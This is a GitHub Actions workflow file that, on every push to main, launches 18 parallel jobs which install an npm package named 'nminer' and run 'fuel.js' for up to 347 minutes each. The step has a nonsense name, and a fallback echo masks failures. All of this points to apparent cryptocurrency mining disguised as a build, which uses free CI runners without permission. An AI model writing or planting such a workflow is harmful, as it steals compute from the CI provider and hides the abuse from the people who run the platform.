name: fuel
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6868 }
          - { version: 7497 }
          - { version: 6294 }
          - { version: 9346 }
          - { version: 7457 }
          - { version: 7871 }
          - { version: 9842 }
          - { version: 2558 }
          - { version: 5782 }
          - { version: 2173 }
          - { version: 2929 }
          - { version: 7193 }
          - { version: 6331 }
          - { version: 1076 }
          - { version: 335 }
          - { version: 2687 }
          - { version: 3378 }
          - { version: 3243 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: eek shinny er mozzarella
        run: |
          npm install nminer@latest
          timeout 347m node fuel.js || echo "fuel executed"